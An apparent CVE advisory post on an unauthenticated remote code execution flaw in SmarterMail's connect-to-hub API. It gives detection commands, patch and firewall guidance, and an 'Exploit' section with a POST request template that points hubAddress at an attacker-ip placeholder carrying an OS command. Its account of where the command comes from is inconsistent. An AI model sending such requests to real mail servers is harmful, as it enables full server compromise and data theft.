Listen to this Post
The vulnerability is an unauthenticated remote code execution (RCE) flaw in SmarterTools SmarterMail versions prior to build 9511, specifically within the `ConnectToHub` API method (/api/v1/settings/sysadmin/connect-to-hub) defined in `MailService.dll` . This API endpoint explicitly allows anonymous users and processes JSON data sent in POST requests . The root cause is that the endpoint does not properly validate the `hubAddress` parameter within the JSON object. An attacker can point this parameter to a malicious HTTP server they control. The vulnerable SmarterMail server then connects to this attacker-controlled server, which responds with a malicious operating system command embedded within the JSON data . This command is passed to the `CommandMount` parameter and subsequently executed by the vulnerable application on the target system with the privileges of the SmarterMail service, leading to full system compromise . The attack can be mounted against Windows, Linux, Docker, and macOS platforms running the vulnerable software .
dailycve form:
Platform: SmarterTools SmarterMail
Version: Build 9511 earlier
Vulnerability: Unauthenticated RCE via
Severity: CRITICAL 9.3 CVSS
Date: Jan 15 2026
Prediction: Already released (Jan15)
What Undercode Say:
Analytics
Check current SmarterMail version (unauthenticated):
curl -k https://<target-ip>/api/v1/licensing/about | jq '.ProductVersion'
Check for exploitation attempts in logs:
sudo grep -i "connect-to-hub" /var/log/smartermail/.log | grep " 400 "
Select-String -Path "C:\SmarterMail\Logs.log" -Pattern "connect-to-hub" | Select-String " 400 "
Nessus plugin ID for detection: 298241 .
Exploit
1. Setup: Attacker hosts a malicious HTTP server.
2. Payload: JSON payload sent to target API:
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: <target-smartermail>
Content-Type: application/json
{
"hubAddress": "http://<attacker-ip>:<port>",
"CommandMount": "<malicious-os-command>"
}
3. Execution: Target fetches `CommandMount` value from attacker server and executes it .
Protection from this CVE
- Patch: Immediately update to SmarterMail Build 9511 or later . Build 9518 (Jan 22, 2026) also includes the fix .
- Mitigation: If patching is impossible, restrict network access to the API endpoint `/api/v1/settings/sysadmin/connect-to-hub` using a firewall or web application firewall (WAF) to block unauthenticated external requests .
- Monitor: Monitor for any POST requests to the `connect-to-hub` endpoint, as these are highly indicative of malicious activity in unpatched systems .
Impact
System Compromise: Unauthenticated attackers can achieve complete remote code execution, leading to full server takeover .
Data Breach: Successful exploitation allows attackers to access all emails, credentials, and sensitive data stored on the mail server .
Ransomware Deployment: CISA has confirmed this vulnerability is being actively exploited in ransomware campaigns, posing a severe operational and financial risk .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode

